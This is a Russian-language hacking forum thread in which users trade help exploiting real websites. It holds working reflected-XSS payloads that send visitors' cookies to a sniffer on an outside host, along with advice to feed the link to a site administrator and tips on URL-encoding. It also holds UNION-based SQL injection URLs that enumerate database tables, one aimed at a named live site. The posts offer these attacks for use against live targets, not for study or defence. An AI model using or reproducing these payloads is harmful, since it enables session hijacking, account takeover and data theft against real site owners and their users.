когда тебе нужно просмотреть кучу баз и кучу таблиц, то ручками ты потеряешь довольно много времени, ну а если это можно сделать программно, то зачем же его терять? если программно не получилось, то тогда да, нужно уже руками делать
Естественно, когда уже скуль найдена и вывод есть, то дампить или выводить данные можно программно - лично я так и делаю. А искать вручную.
Верно, согласен, ищешь для начала в ручную, потому как проги далеко не все жрут и находят, а пот дампить 200к записей в ручную, это абсолютно не реально, а вот если только пасс накопать, тогда понятно, можно и ручками. Сори за оффтоп
Глуповатый вопрос. Например, нашел я пару пассивных хссок на одном сайте... Что дальше? Нужно взять где-то исходники сниффера и поставить их на каком-нибудь хосте, или можно воспользоваться античатовским сниффером? Какой код надо сунуть в урл, чтобы куки отправлялись на сниффер? Не пинайте только) https://forum.antichat.ru/thread20140.html - это читал, но не нашел (или не понял) ответа((
Если на сайте с авторизацией, то сунуть админу, если нет - забить. Ачатовский не пашет, есть другие, но можно поставить свой. Можешь поискать сниф от Kanick'a _http://www.kanick.ru/sniffer/ Почитай еще, там есть ответ на твой последний вопрос..
Есть) Персонал-версию скачал, поставил на хосте, конфиг оставил как есть. Попробовал дать залогиненному юзеру ссылку с Code: <script>img=new Image();img.src="http://*****.ru/sniffer/i.gif?"+document.cookie;"+document.cookie;</script> , и ссылку с Code: <script>img=new Image();img.src="http://*****.ru/sniffer/s.gif?"+document.cookie;"+document.cookie;</script> , т.к. не знаю, адрес какой картинки подставлять) Но на сниффер ничего не пришло. Или я совсем туплю и нужно указывать адрес вовсе не к картинке? Запутался.
2Boa качай делюкс _ссылка самоуничтожится через 5 минут + надо немного подправить конф ($sniffer_path = "http://sniffer_path/") + там есть немного фака имхо, но лучше так http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script> где обращаетса к http://haknet.h16.ru/script/js.js а в js.js есть: img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie; этот способ более надёжен. ПС сылка должнa быть не на нартинку (i.gif) а на скрипт(s.gif)
Code: http://******.ru/archive.php?year=<script>img=new Image();img.src="http://******.ru/sniffer/s.gif?"+document.cookie;"+document.cookie;</script> Что тут неправильно?( Путь в конфиге прописал. Второй вариант трудоемок, а у меня два ночи) попробую потом.
Привет! Спасибо за ответ! Первый запрос не отработал - результат тот же (долгая загрузка, пустая страница). Интересное наблюдение: Code: http://example.com/detail.php?id=-1+union+select+1,2,3,4,5+from+information_schema.user_privileges--+ работает, а Code: http://example.com/detail.php?id=-1+union+select+1,2,3,4,5+from+information_schema.tables--+ нет. Получается, смотреть некоторые таблицы из INFORMATION_SCHEMA удается, другие - нет. Причем не сильно похоже на разграничение доступа, в противном случае была бы ошибка.
Пробел видишь ? Там после передачи будет стоять %20 А выглядеть он будет так : Чтобы там был пробел после передачи надо поставить +. это во первых, а во вторых везде где стоять + замени их на %2b,после передачи там автоматически будет стоять +,если не поставишь %2b там будет стоять пробел Вот например: Code: http://*.ru/archive.php?year=<script>img=new+Image();img.src="http://*.ru/sniffer/s.gif?"%2bdocument.cookie;"</script>
Decoy Ну если первый запрос не сработал значит там нет таблиц отвечающих критерию запроса => нужно составить запрос по другому, пробуй захексить column_name=user без процентиков, а вобще с линком былобы просще... сори больше не знаю что тебе посоветовать) PS:проверь таблицы вставив в принтабельное поле count(*) фромь так же как в посте выше.
тупой вопрос, раньше их пропускал, а ща задумался. Есть ли смысл продолжать искать скули, если вылезает страница с надписью "hacking attempt" либо подобные редиректы?
http://www.jain4jain.com/profile_viewed_details.php?user_id=9843' union select 1,2,AES_DECRYPT(AES_ENCRYPT(group_concat(version()),0x71),0x71),4,5--+ ->5.0.91-community http://www.jain4jain.com/profile_viewed_details.php?user_id=9843' union select 1,2,AES_DECRYPT(AES_ENCRYPT(group_concat(table_name),0x71),0x71),4,5 %20from%20information_schema.tables%20where%20table_schema='jain4_jain4jain' limit 1,1--+ Не обуви стол?
Залогинился, поставил галочку на "запомнить", потои прошел по такой урле, но все равно на сниффер ничего не пришло Попробовал вторым способом, где ссылка на жаваскрипт, но все равно не получилось.
Dare https://forum.antichat.ru/showpost.php?p=2243791&postcount=14265 Попробовал Code: http://example.com/detail.php?id=-1+UNION+SELECT+1,GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME)+SEPARATOR+0x3C62723E),3,4,5+from+information_schema.columns+where+0x636F6C756D6E5F6E616D653D75736572--+ Все тот же результат. Не знаю уже, что и думать. Может какие-то обращения к некоторым таблицам из INFORMATION_SCHEMA как-то фильтруются?
Мб что просто нет к ней доступа (прав не хватает), но ты же грил что некоторые таблицы читал? Без линка увы ни чем помочь не смогу, если что стучи в асю или ПМ Последний пост на эту тему!
Dare Ссылка выше. Я думаю, если проблема в правах доступа, то сайт выдал бы ошибку (из-за нехватки аргументов), как если сделать select 1,2,3,4 вместо select 1,2,3,4,5. PS Постучал по ICQ.
Надеюсь там есть уязвимость XSS-injection ? Если что открой страницу кода и посмотри как он там передался.
